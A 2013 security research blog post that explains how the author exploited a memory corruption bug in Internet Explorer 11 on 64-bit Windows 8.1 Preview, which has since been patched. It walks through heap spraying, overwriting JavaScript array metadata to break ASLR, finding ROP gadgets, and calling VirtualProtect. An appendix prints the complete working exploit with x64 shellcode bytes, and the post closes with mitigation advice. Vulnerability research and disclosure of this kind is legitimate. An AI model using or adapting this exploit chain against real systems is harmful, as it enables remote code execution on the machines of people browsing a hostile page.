Wednesday, November 6, 2013

Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview

Note: The vulnerability described here has been patched by Microsoft in October 2013 security update.

Earlier this year, Microsoft announced several security bounty programs one of which was a bounty program for bugs in Internet Explorer 11. I participated in this program and relatively quickly found a memory corruption bug. Although I believed the bug could be exploited for remote code execution, due to lack of time (I just became a father right before the bounty programs started so I had other preoccupations) I haven’t actually developed a working exploit at the time. However, I was interested in the difficulty of writing an exploit for the new OS and browser version so I decided to try to develop an exploit later. In this post, I’ll first describe the bug and then the development of a working exploit for it on 64-bit Windows 8.1 Preview.

When setting out to develop the exploit I didn't strive to make a 100% reliable exploit (The specifics of the bug would have made it difficult and my goal was to experiment with the new platform and not make the next cyber weapon), however I did set some limitations for myself that would make the exercise more challenging:
1. The exploit should not rely on any plugins (so no Flash and no Java). I wanted it to work on the default installation.
2. The exploit must work on 64-bit IE and 64-bit Windows. Because 32-bit would be cheating as many exploit mitigation techniques (such as heap base randomization) aren't really effective on 32-bit OS or processes. Additionally, there aren't many 64-bit Windows exploits out there.
3. No additional vulnerabilities should be used (e.g. for ASLR bypass)

One prior note about exploiting 64-bit Internet Explorer: In Windows 8 and 8.1, when running IE on the desktop (“old interface”) the renderer processes of IE will be 32-bit even if the main process is 64-bit. If the new (“touch screen”) interface is used everything is 64-bit. This is an interesting choice and makes the desktop version of IE less secure. So in the default environment, the exploit shown here actually targets the touch screen interface version of IE.

To force IE into using 64-bit mode on the desktop for exploit development, I forced IE to use single process mode (TabProcGrowth registry key). However note that this was used for debugging only and, if used for browsing random pages, it will make IE even less secure because it disables the IE’s sandbox mode.

The bug

A minimal sample that triggers the bug is shown below.

function bug() {
 t = document.getElementsByTagName("table")[0];
 t.parentNode.runtimeStyle.posWidth = "";
<body onload=bug()>
<table><th><ins>aaaaaaaaaa aaaaaaaaaa

And here is the the debugger output.

(4a8.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> r
rax=000000a6d1466170 rbx=000000a6d681c360 rcx=000000000000007f
rdx=0000000001ffffff rsi=000000a6d5960330 rdi=00000000ffffffff
rip=00007ff8e0c90306 rsp=000000a6d61794b0 rbp=000000a6d5943a90
r8=0000000000000001  r9=0000000000000008 r10=00000000c0000034
r11=000000a6d61794a0 r12=00000000ffffffff r13=00000000ffffffff
r14=000000000000000b r15=00000000ffffffff
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> k
Child-SP          RetAddr           Call Site
000000a6`d61794b0 00007ff8`e0e49cc0 MSHTML!Layout::ContainerBox::ContainerBox+0x1e6
000000a6`d6179530 00007ff8`e0e554a8 MSHTML!Layout::TableGridBox::TableGridBox+0x38
000000a6`d6179590 00007ff8`e0e553c2 MSHTML!Layout::TableGridBoxBuilder::CreateTableGridBoxBuilder+0xd8
000000a6`d6179600 00007ff8`e0c8b720 MSHTML!Layout::LayoutBuilder::CreateLayoutBoxBuilder+0x2c9
000000a6`d61796c0 00007ff8`e0c8a583 MSHTML!Layout::LayoutBuilderDriver::StartLayout+0x85f
000000a6`d61798d0 00007ff8`e0c85bb2 MSHTML!Layout::PageCollection::FormatPage+0x287
000000a6`d6179a60 00007ff8`e0c856ae MSHTML!Layout::PageCollection::LayoutPagesCore+0x2aa
000000a6`d6179c00 00007ff8`e0c86389 MSHTML!Layout::PageCollection::LayoutPages+0x18e
000000a6`d6179c90 00007ff8`e0c8610f MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x251
000000a6`d6179db0 00007ff8`e0df85ca MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd7
000000a6`d6179e70 00007ff8`e12d472d MSHTML!CMarkupPageLayout::DoLayout+0x76
000000a6`d6179eb0 00007ff8`e0d9de95 MSHTML!CView::EnsureView+0xcde
000000a6`d617a270 00007ff8`e0d1c29e MSHTML!CElement::EnsureRecalcNotify+0x135
000000a6`d617a310 00007ff8`e1556150 MSHTML!CElement::EnsureRecalcNotify+0x1e
000000a6`d617a350 00007ff8`e1555f6b MSHTML!CElement::focusHelperInternal+0x154
000000a6`d617a3b0 00007ff8`e19195ee MSHTML!CElement::focus+0x87
000000a6`d617a400 00007ff8`e06ed862 MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x52
000000a6`d617a460 00007ff8`e06f0039 jscript9!amd64_CallFunction+0x82
000000a6`d617a4b0 00007ff8`e06ed862 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x154
000000a6`d617a550 00007ff8`e06f26ff jscript9!amd64_CallFunction+0x82

As can be seen above, IE crashes in MSHTML!Layout:ContainerBox:ContainerBox function while attempting to read uninitialized memory pointed to by rax + rdx*8. rax actually points to valid memory that contains a CFormatCache object (which looks correct given the PoC), while the value of rdx (0x0000000001ffffff) is interesting. So I looked at the code of ContainerBox:ContainerBox function to see where this value comes from and also what can be done if an attacker would control the memory at rax + 0xffffff8.

00007ffb`dac00145 83cdff          or      ebp,0FFFFFFFFh
00007ffb`dac0023e 440fb64713      movzx   r8d,byte ptr [rdi+13h]
00007ffb`dac00243 410fb6c0        movzx   eax,r8b
00007ffb`dac00247 c0e805          shr     al,5
00007ffb`dac0024a 2401            and     al,1
00007ffb`dac0024c 0f84048f6200    je      MSHTML!Layout::ContainerBox::ContainerBox+0x562 (00007ffb`db229156)
00007ffb`dac00252 440fb76f68      movzx   r13d,word ptr [rdi+68h]
00007ffb`db229156 448bed          mov     r13d,ebp
00007ffb`db229159 e9f9709dff      jmp     MSHTML!Layout::ContainerBox::ContainerBox+0x137 (00007ffb`dac00257)
00007ffb`dac002db 410fbffd        movsx   edi,r13w
00007ffb`dac002fb 8bcf            mov     ecx,edi
00007ffb`dac002fd 8bd7            mov     edx,edi
00007ffb`dac002ff 48c1ea07        shr     rdx,7
00007ffb`dac00303 83e17f          and     ecx,7Fh
00007ffb`dac00306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:0000007a`390257f8=????????????????
00007ffb`dac0030a 488d0c49        lea     rcx,[rcx+rcx*2]
00007ffb`dac0030e 488d14c8        lea     rdx,[rax+rcx*8]
00007ffb`dac00312 8b4cc810        mov     ecx,dword ptr [rax+rcx*8+10h]
00007ffb`dac00316 8b420c          mov     eax,dword ptr [rdx+0Ch]
00007ffb`dac00319 3bc8            cmp     ecx,eax
00007ffb`dac0031b 0f83150d7500    jae     MSHTML!Layout::ContainerBox::ContainerBox+0x750f16 (00007ffb`db351036)
00007ffb`dac00321 ffc0            inc     eax
00007ffb`dac00323 89420c          mov     dword ptr [rdx+0Ch],eax

The value of rdx at the time of crash comes after several assignments from the value of ebp which is initialized to 0xFFFFFFFF near the beginning of the function (note that ebp/rbp is not used as the frame pointer here). My assumption is that the value 0xFFFFFFFF (-1) is an initial value of variable used as an index into CFormatCache. Later in the code, a pointer to a CTreeNode is obtained, a flag in the CTreeNode is examined and if it is set, the index value is copied from the CTreeNode object. However, if the flag is not set (as is the case in the PoC), the initial value is used. The value 0xFFFFFFFF is then split into two parts, upper and lower (it looks like CFormatCache is implemented as a 2D array). A value of the higher index (will be equal to 0x1ffffff) will be multiplied by 8 (size of void*), this offset is added to rax and the content at this memory location is written back to rax. Then, a value of the lower index (will be 0x7f) is multiplied with 24 (presumably the size of CCharFormat element), this offset is added to eax and the content of this memory location is written to rdx. Finally, and this is the part relevant for exploitation, a number at [rdx+0C] is taken, increased, and then written back to [rdx+0C].

Written in C++ and simplified a bit, the relevant code would look like this:

int cacheIndex = -1;
if(treeNode->flag) {
  cacheIndex = treeNode->cacheIndex;
unsigned int index_hi = cacheIndex, index_lo = cacheIndex;
index_hi = index_hi >> 7;
index_lo = index_lo & 0x7f;
//with sizeof(formatCache[i]) == 8 and sizeof(formatCache[i][j]) == 24

For practical exploitation purposes, what happens is this: A pointer to valid memory (CFormatCache pointer) is increased by 0x0FFFFFF8 (256M) and the value at this address is treated as another pointer. Let’s call the address (CFormatCache address + 0x0FFFFFF8) P1 and the address it points to P2. The DWORD value at (P2 + BF4) will be increased by 1 (Note: BF4 is computed as 0x7F * 3 * 8 + 0x0C).

The exploit

If we were writing an exploit for a 32-bit process, a straightforward (though not very clean) way to exploit the bug using heap spraying would be to spray with a 32-bit number such that when BF4 is added to it, an address of something interesting (e.g. string or array length) is obtained. An “address of something interesting” could be predicted by having another heap spray consisting of “interesting objects”.

Since the exploit is being written for 64-bit process with full ASLR, we won’t know or be able to guess an address of an “interesting” object. We certainly won’t be able to fill an address space of a 64-bit process and heap base will be randomized, thus making addresses of objects on the heap unpredictable.

Heap spraying lives

However, even in this case, heap spraying is still useful for the first part of the exploit. Note that when triggering the bug, P1 is calculated as a valid heap address increased by 0x0FFFFFF8 (256M). And if we heap spray, we are allocating memory relative to the heap base. Thus, by spraying approximately 256M of memory we can set P2 to arbitrary value.

So to conclude, despite significantly larger address space in 64-bit processes and heap base randomization, heap spraying is still useful in cases where we can make a vulnerable application dereference memory at a valid heap address + a large offset. As this is a typical behavior for bounds checking vulnerabilities, it’s not altogether uncommon. Besides the bug being discussed here, the previous IE bug I wrote about exploiting here also exhibits this behavior.

Although heap spraying is often avoided in modern exploits in favor of the more reliable alternatives, given a large (fixed) offset of 256M, it is pretty much required in this case. And although the offset is fixed, it’s a pretty good value as far as heap spraying goes. Not too large to cause memory exhaustion and not too small to cause major reliability issues (other than those from using heap spraying in the first place).

Look Ma, no Flash

But the problem of not being able to guess an address of an interesting object still remains, and thus the question is, what do we heap spray with? Well, instead of heap spraying with the exact values, we can spray with pointers instead. Since an offset of 0xBF4 is added to P2 before increasing the value it points to, we’ll spray with an address of some object and try to make this address + 0xBF4 point to something of interest.

So what should “something of interest” be? The first thing I tried is a length of a JavaScript string as in here. And although I was able to align the stars to overwrite higher dword of a qword containing a string length, a problem arose: JavaScript string length is treated as a 32-bit number. Note that most pointers (including those we can easily use in our heap spray) on 64-bit will be qword aligned and when adding an offset of 0xBF4 to such a pointer we will end up with a pointer to higher dword in a qword-aligned memory. So an interesting value needs to either be 64-bit or not qword aligned.

Another idea was to try to overwrite an address. However, note that triggering the bug would increase the address by 4GB as (assuming a qword-aligned address) we are increasing the higher dword. To control the content at this address we would need another heap spray of ~4G data and this would cause memory issues on computers with less free RAM than that. Incidentally, the computer I ran Windows 8.1 Preview VM on had only 4GB of RAM and the Windows 8.1 VM had just 2GB of RAM so I decided to drop this idea and look at alternatives.

In several recent exploits used in the wild, a length of a Flash array was overwritten to leverage a vulnerability. While Flash was off limits in this exercise, let’s take a look at JavaScript arrays in IE 11 instead. As it turns out, there is an interesting value that is correctly aligned. An example JavaScript Array object with explanation of some of the fields is shown below. Note that the actual array content may be split across several buffers.

offset:0, size:8 vtable ptr
offset:0x20, size:4 array length
offset:0x28, size:8 pointer to the buffer containing array data
[beginning of the first buffer, stored together with the array]
offset:0x50, size:4 index of the first element in this buffer
offset:0x54, size:4 number of elements currently in the buffer
offset:0x58, size:4 buffer capacity
offset:0x60, size:8 ptr to the next buffer
offset:0x68, size:varies array data stored in the buffer

Although it’s not necessary for understanding the exploit, here’s also an example String object with explanation of some of the fields.

offset:0, size:8 vtable ptr
offset:0x10, size:4 string length
offset:0x18, size:8 data ptr

As can be seen from above, the “number of elements currently in the buffer” of a JavaScript array is not qword-aligned and is a value that might be interesting to overwrite.

This is indeed the value I ended up going for. To accomplish this, I got the memory aligned as seen in the image below.

We’ll heap spray with pointers to a JavaScript String object by creating large JavaScript arrays where each element of the array will be the same string object. We’ll also get memory aligned in such a way that, at an offset 0xBF4 from the start of the string, there will be a a part of a JavaScript array that holds the value we want to overwrite.

You might wonder why I heap sprayed with pointers to String and not an Array object. The reason for this is that the String object is much smaller (32 bytes vs. 128 bytes) so by having multiple strings close to one another and pointing to a specific one, we can better “aim” for a specific offset inside an Array object. Of course, if we have several strings close to one another, the question becomes which one to use in a heap spray. Since an Array object is 4 time the size of a String, there are four different offsets in the Array we can overwrite. By choosing randomly, in one case (with probability 1/4), we will overwrite exactly what we want. In one case, we will overwrite an address that will cause a crash on a subsequent access of the array. And in the remaining two cases, we will overwrite values that are not important and we would be able to try again by spraying with a pointer to a different string. Thus a blind guess will give success probability of 1/4 while a try/retry approach would give a probability of success of 3/4 (if you know your statistics, you might think that this number is wrong, but we can actually avoid crashes after an incorrect but non-fatal attempt by trying different strings in a descending order). An even better approach would be to disclose the string offsets by first aligning memory in a way to put something readable at an offset 0xBF4 from the String object used in the heap spray. While I have observed that this is possible, this isn’t implemented in the provided exploit code and is left as an exercise for the reader. Refer to the next section for information that could help you to achieve such alignment.

In the exploit code provided, a naive (semi)blind-guess approach is used where there is a large array of Strings (strarr) and a string at a constant index is used for the heap spray. I have observed that this works reliably for me when opening the PoC in a new process/tab (so I didn’t have any other JavaScript objects in the current process). If you want to play with the exploit and the index I used doesn’t work for you, you’ll likely need to pick a different one or implement one of the approaches described above.

Feng Shui in JavaScript heap

Before moving on with the exploit, let’s first take some time to examine how it’s possible to heap spray in IE11 and get a correct object alignment on heap with a high reliability.

Firstly, heap spraying: While Microsoft has made it rather difficult to heap spray with JavaScript strings, JavaScript arrays in IE11 appear not to prevent this in any way. It’s possible to spray both with pointers (as seen above) as well as with absolute values by e.g. creating a large array of integers. While many recent IE exploits use Flash for heap spraying, it’s not necessary and, given the current Array implementation and improved speed over the predecessors, JavaScript arrays might just be the object of choice to implement heap spraying in IE in the future.

Secondly, alignment of objects on heap: While the default Heap implementation in Windows 8 and above (the low fragmentation heap) includes several mitigations that make getting the desired alignment difficult, such as guard pages and allocation order randomization, in IE11 basic JavaScript objects (such as Arrays and Strings) use a custom heap implementation that has none of these features.

I’ll shortly describe what I observed about this JavaScript heap implementation. Note that all of the below is based on observation of the behavior and not reverse-engineering the code, so I might have made some wrong conclusions, but it works as described for the purposes of the given exploit.

The space for the JavaScript objects is allocated in blocks of 0x20000 bytes. If more space is needed, additional blocks will be allocated and there is nothing preventing these blocks to be right next to one another (so a theoretical overflow in one block could write into another).

These blocks are further divided into bins of 0x1000 bytes (at least for small objects). One bin will only hold objects of the same size and possibly type. So for example, in this exploit where we have String and Array objects of size 32 and 128 bytes respectively, some bins will hold only String objects (128 of them at most), while some of them will hold only Array objects (32 of them at most). When a bin is fully used, it contains only the “useful” content and no metadata. I have also observed that the objects are stored in separate 0x20000-size blocks than the user-provided content, so string and array data will be stored in different blocks than the corresponding String and Array objects, except when the data is small enough to be stored together with the object (e.g. single-character strings, small arrays like the 5-element ones in the exploit).

The allocation order of objects inside a given bin is sequential. That means that, e.g. if we create three String objects in close succession and assuming no holes in any of the bins, they will be next to each other with the first one having the lowest address, followed by the second followed by the third.

And now, for my next trick

So at this point we can increment the number of elements in the JavaScript array. In fact, we’ll trigger the vulnerability multiple times (5 times in the provided exploit, where each trigger will increase this number by 3) in order to increase it a bit more. Unfortunately, increasing the number of elements does not allow us to write data past the end of the buffer, but it does allow us to read data past the end. This is sufficient at this point because it allows us to break ASLR and learn the precise address of the Array object we overwrote.

Knowing the address of the Array object, we can repeat the heap spray, but this time, we’ll spray with exact values (I used Array of integers to spray with the exact values). A value we are going to spray with is going to be an address of buffer capacity of an array decreased by 0xBF1. This means that that the spray value + 0xBF4 will be the address of the highest byte of the buffer capacity value. After the buffer capacity has been overwritten, we’ll be able to both read and write data past the end of the JS Array’s buffer.

From here, we can quite easily get the two important elements that constitute a modern browser exploit: The ability to read arbitrary memory and to gain control over RIP.

We can read arbitrary memory by scanning the memory after the Array for a String object and then overwriting the data pointer and (if we want to read larger data) size of the string.

We can get control over RIP by overwriting a vtable pointer of a nearby Array object and triggering a virtual method call. While IE10 introduced Virtual Table Guard (vtguard) for some classes in mshtml.dll, jscript9.dll has no such protections. However note that, having arbitrary memory disclosure, even if vtguard was present it would be just a minor annoyance.

64-bit exploits for 32-bit exploit writers

With control over RIP and memory disclosure, we’ll want to construct a ROP chain in order to defeat DEP. As we don’t control the stack, the first thing we need is a stack pivot gadget. So, with arbitrary memory disclosure it should be easy to search for xchg rax,rsp; ret; in some executable module, right? Well, no. As it turns out, in x64, stack pivot gadgets are much less common than in x86 code. On x86, xchg eax,esp; ret; will be just 2 bytes in size, so there will be many unintended sequences like that. On x64 xchg rax,rsp; is 3 bytes which makes it much less common. Having not found it (or any other “clean” stack pivot gadgets) in mshtml.dll and jscript9.dll, I had to look for alternatives. After a look at mshtml.dll I found a stack pivot sequence shown below which isn’t very clean but does the trick assuming both rax and rcx point to a readable memory (which is the case here).

00007ffb`265ea973 50              push    rax
00007ffb`265ea974 5c              pop     rsp
00007ffb`265ea975 85d2            test    edx,edx
00007ffb`265ea977 7408            je      MSHTML!CTableLayout::GetLastRow+0x25 (00007ffb`265ea981)
00007ffb`265ea979 8b4058          mov     eax,dword ptr [rax+58h]
00007ffb`265ea97c ffc8            dec     eax
00007ffb`265ea97e 03c2            add     eax,edx
00007ffb`265ea980 c3              ret
00007ffb`265ea981 8b8184010000    mov     eax,dword ptr [rcx+184h]
00007ffb`265ea987 ffc8            dec     eax
00007ffb`265ea989 c3              ret

Note that, while there is a conditional jump in the sequence, both branches end with RET and won’t cause a crash so they both work well for our purpose. While the exploit mostly relies on jscript9 objects, an address of (larger) mshtml.dll module can be easily obtained using memory disclosure by pushing a mshtml object into a JS array object we can read and then following references from the array to mshtml object and its vtable.

After the control of the stack is gained, we can call VirtualProtect to make a part of heap we can write to executable. We can find the address of VirtualProtect in the IAT of mshtml.dll (the exploit includes some very basic PE32+ parsing). So, with the address of VirtualProtect and control over the stack, we can now just put the correct arguments of on the stack and return into VirtualProtect, right? Well, no. In 64-bit Windows, a different calling convention is used than in 32-bit. 64-bit Windows uses a fastcall convention where the first 4 arguments (which is exactly the number of arguments VirtualProtect has) are passed through registers RCX, RDX, R8 and R9 (in that order). So we need some additional gadgets to load the correct argument into the correct registers:

pop rcx; ret;
pop rdx; ret;
pop r8; ret;
pop r9; ret;

As it turns out the first three are really common in mshtml.dll. The forth one isn’t, however for VirtualProtect the last argument just needs to point to a writeable memory which is already the case at the time we get control over RIP, so we don’t actually have to change r9.

The final ROP chain looks like this:

address of pop rcx; ret;
address on the heap block with shellcode
address of pop rdx; ret;
0x1000 (size of the memory that we want to make executable)
address of pop r8; ret;
address of VirtualProtect
address of shellcode

So, we can now finally execute some x64 shellcode like SkyLined’s x64 calc shellcode that works on 64-bit Windows 7 and 8, right? Well, no. Shellcode authors usually (understandably) prefer small shellcode size over generality and save space by relying on specifics of the OS that don’t need to be true in the future versions. For example, for compatibility reasons, Windows 7 and 8 store PEB, module information structures as well as ntdll and kernel32 modules at addresses lower than 2G. This is no longer true in Windows 8.1 Preview. Also, while Windows x64 fastcall calling convention requires leaving 32 bytes of shadow space on the stack for the use of calling function, SkyLined’s win64-exec-calc-shellcode leaves just 8 bytes before calling WinExec. While this appears to work on Windows 7 and 8, on Windows 8.1 preview it will cause the command string (“calc” in this case) stored on the stack to be overwritten as it will be stored in WinExec’s shadow space. To resolve these compatibility issues I made modifications to the shellcode which I provided in the exploit. It should now work on Windows 8.1.

That’s it, finally we can execute the shellcode and have thus proven arbitrary code execution. As IE is fully 64-bit only in the touch screen mode, I don’t have a cool screenshot of Windows Calculator popped over it (calc is shown on the desktop instead). But I do have a screenshot of the desktop with IE forced into a single 64-bit process.

The full exploit code can be found at the end of this blog post.


Although Windows 8/8.1 packs an impressive arsenal of memory corruption mitigations, memory corruption exploitation is still alive and kicking. Granted, some vulnerability classes might be more difficult to exploit, but the vulnerability presented here was the first one I found in IE11 and there are likely many more vulnerabilities that can be exploited in a similar way. The exploit also demonstrates that, under some conditions, heap spraying is still useful even in 64-bit processes. In general, while there have been a few cases where it was more difficult to write parts of the exploit on x64 than it would be on x86 (such as finding what to spray with and overwrite, finding stack pivot sequences etc.), the difficulties wouldn't be sufficient to stop a determined attacker.

Finally, based on what I've seen, here are a few ideas to make writing exploits for IE11 on Windows 8.1 more difficult:
  • Consider implementing protection against heap spraying with JavaScript arrays. This could be implemented by RLE-encoding large arrays that consist of a single repeated value or several repeated values.
  • Consider implementing the same level of protection for the JavaScript heap as for the default heap implementation - add guard pages and introduce randomness.
  • Consider implementing Virtual Table Guard for common JavaScript objects.
  • Consider making compiler changes to remove all stack pivot sequences from the generated code of common modules. These are already scarce in x64 code so there shouldn't be a large performance impact.

Appendix: Exploit Code

 var magic = 25001; //if the exploit doesn't work for you try selecting another number in the range 25000 -/+ 128
 var strarr = new Array();
 var arrarr = new Array();
 var sprayarr = new Array();
 var numsploits;
 var addrhi,addrlo;
 var arrindex = -1;
 var strindex = -1;
 var strobjidx = -1;
 var mshtmllo,mshtmlhi;

 //calc shellcode, based on SkyLined's x64 calc shellcode, but fixed to work on win 8.1
 var shellcode = [0x40, 0x80, 0xe4, 0xf8, 0x6a, 0x60, 0x59, 0x65, 0x48, 0x8b, 0x31, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x4f, 0x3c, 0x8b, 0x5c, 0x0f, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x4c, 0x1f, 0x24, 0x48, 0x01, 0xf9, 0x31, 0xd2, 0x0f, 0xb7, 0x2c, 0x51, 0xff, 0xc2, 0xad, 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xf0, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x31, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xff, 0xd7, 0xcc, 0, 0, 0, 0];

//triggers the bug
function crash(i) {
 numsploits = numsploits + 1;
 t = document.getElementsByTagName("table")[i];
 t.parentNode.runtimeStyle.posWidth = -1;
 setTimeout(cont, 100);  

//heap spray
function spray() {
 var aa = "aa";

 //create a bunch of String and Array objects
 for(var i=0;i<50000;i++) {
   strarr[i] = aa.toUpperCase();
   arrarr[i] = new Array(1,2,3,4,5);

 //heap-spray with pointers to a String object
 for(var i=0;i<2000;i++) {
   var tmparr = new Array(16000);
   for(var j=0;j<16000;j++) {
     tmparr[j] = strarr[magic];
   sprayarr[i] = tmparr;


function cont() {
 if(numsploits < 5) {
 if(numsploits < 6) {
   setTimeout(afterFirstOverwrite, 0);

function afterFirstOverwrite() {
 //check which array was overwritten
 for(var i=24000;i<25000;i++) {
   arrarr[i][18] = 1;
   var a = arrarr[i][4];
   var b = arrarr[i][16];
   var c = arrarr[i][17];
   if(typeof(b)!="undefined") {
     arrindex = i;
     addrlo = b;
     addrhi = c;
 if(arrindex < 0) {
   alert("Exploit failed, error overwriting array");
 //re-spray to overwrite buffer capacity
 for(var i=0;i<2000;i++) {
   sprayarr[i] = new Array(32000);
 for(var i=0;i<2000;i++) {
   for(var j=0;j<32000;j++) {
     if(j%2 == 0) {
       sprayarr[i][j] = addrlo + 8 - 0xBF4 + 3;
     } else {
       sprayarr[i][j] = addrhi;

//unsigned to signed conversion
function u2s(i) {
 if(i>0x80000000) {
   return -(0xFFFFFFFF - i + 1);
 } else {
   return i;

//signed to unsigned conversion
function s2u(i) {
 if(i<0) {
   return (0xFFFFFFFF + i + 1);
 } else {
   return i;

//memory disclosure helper function, read 32-bit number from a given address
function read32(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0) + 0x10000 * strarr[strindex].charCodeAt(1);

//memory disclosure helper function, read 16-bit number from a given address
function read16(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0);

function afterSecondOverwrite() {
 arrindex = arrindex + 1;
 //adjusts the array length - gives us some space to read and write memory
 arrarr[arrindex][2+0x5000/4] = 0;
 //search for the next string object and overwrite its length and content ptr to write jscript9
 for(var i=1;i<=5;i++) {
   if((arrarr[arrindex][2 + i*0x400 - 0x20] == 2) && (arrarr[arrindex][3 + i*0x400 - 0x20] == 0)) {
     strobjidx = i*0x400 - 0x20 - 2;
     arrarr[arrindex][strobjidx+4] = 4;
     for(var j=20000;j<30000;j++) {
       if(strarr[j].length != 2) {
         strindex = j;
 if(strindex < 0) {
   alert("Exploit failed, couldn't overwrite string length");

 //create a mshtml object and follow references to its vtable ptr
 var lo1,hi1,lo2,hi2;
 arrarr[arrindex+1][0] = document.createElement("button");
 lo1 = s2u(arrarr[arrindex][6+0x28/4]);
 hi1 = arrarr[arrindex][6+0x28/4 + 1];
 lo2 = read32(hi1, lo1+0x18);
 hi2 = read32(hi1, lo1+0x18+4);
 mshtmllo = read32(hi2, lo2+0x20);
 mshtmlhi = read32(hi2, lo2+0x20+4);
 //find the module base
 mshtmllo = mshtmllo - mshtmllo % 0x1000;
 while(mshtmllo>0) {
   if(read16(mshtmlhi,mshtmllo) == 0x5A4D) break;
   mshtmllo = mshtmllo - 0x1000;

 //find the address of VirtualProtect in the IAT
 var coff = read32(mshtmlhi, mshtmllo + 0x3C);
 var idata = read32(mshtmlhi, mshtmllo + coff + 4 + 20 + 120);
 var iat = read32(mshtmlhi, mshtmllo + idata + 16);
 var vplo =  read32(mshtmlhi, mshtmllo + iat + 0x8a8);
 var vphi =  read32(mshtmlhi, mshtmllo + iat + 0x8a8 + 4);

 //find the rop gadgets in mshtml
 var pivotlo = -1;
 arrarr[arrindex][strobjidx + 4] = 0x01000000;
 arrarr[arrindex][strobjidx + 6] = u2s(mshtmllo);
 arrarr[arrindex][strobjidx + 7] = mshtmlhi;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5C50)
     &&(strarr[strindex].charCodeAt(i+1) == 0xD285)
     &&(strarr[strindex].charCodeAt(i+2) == 0x0874)
     &&(strarr[strindex].charCodeAt(i+3) == 0x408b))
     pivotlo = mshtmllo + i*2;
   if((strarr[strindex].charCodeAt(i) == 0x508B)
     &&(strarr[strindex].charCodeAt(i+1) == 0x855C)
     &&(strarr[strindex].charCodeAt(i+2) == 0x74D2)
     &&(strarr[strindex].charCodeAt(i+3) == 0x8b08))
     pivotlo = mshtmllo + i*2 + 1;
 if(pivotlo < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 var poprcx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC359) {
     poprcx = mshtmllo + i*2;
 if(poprcx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 var poprdx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC35A) {
     poprdx = mshtmllo + i*2;
 if(poprdx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 var popr8 = -1;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5841) && (strarr[strindex].charCodeAt(i+1) % 256 == 0xC3)) {
     popr8 = mshtmllo + i*2;
   if((Math.floor(strarr[strindex].charCodeAt(i)/256) == 0x41) && (strarr[strindex].charCodeAt(i+1) == 0xC358)) {
     popr8 = mshtmllo + i*2 + 1;
 if(popr8 < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 //prepare the fake vtable
 var eaxoffset = 6 + 0x20;
 arrarr[arrindex][eaxoffset + 0x98/4] = u2s(pivotlo);
 arrarr[arrindex][eaxoffset + 0x98/4 + 1] = mshtmlhi;
 //prepare the fake stack
 arrarr[arrindex][eaxoffset] = u2s(poprcx);
 arrarr[arrindex][eaxoffset + 1] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 2] = addrlo;
 arrarr[arrindex][eaxoffset + 3] = addrhi;
 arrarr[arrindex][eaxoffset + 4] = u2s(poprdx);
 arrarr[arrindex][eaxoffset + 5] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 6] = 0x1000;
 arrarr[arrindex][eaxoffset + 7] = 0;
 arrarr[arrindex][eaxoffset + 8] = u2s(popr8);
 arrarr[arrindex][eaxoffset + 9] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 10] = 0x40;
 arrarr[arrindex][eaxoffset + 11] = 0;
 arrarr[arrindex][eaxoffset + 12] = u2s(vplo);
 arrarr[arrindex][eaxoffset + 13] = u2s(vphi);
 arrarr[arrindex][eaxoffset + 14] = addrlo + 24 + eaxoffset*4 + 50*4;
 arrarr[arrindex][eaxoffset + 15] = addrhi;

 //encode the shellcode
 for(var i=0;i<Math.floor(shellcode.length/4);i++) {
    arrarr[arrindex][eaxoffset + 50 + i] = u2s(shellcode[i*4+3]*0x1000000 + shellcode[i*4+2]*0x10000 + shellcode[i*4+1]*0x100 + shellcode[i*4]);

 //overwrite a vtable of jscript9 object and trigger a virtual call
 arrarr[arrindex][7] = addrhi;
 arrarr[arrindex][6] = addrlo + 24 + eaxoffset*4;
 //arrarr[arrindex][7] = 0x123456;
 //arrarr[arrindex][6] = 0x123456;


function run() {
 numsploits = 0;
 window.setTimeout(spray, 1000);

<body onload=run()>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
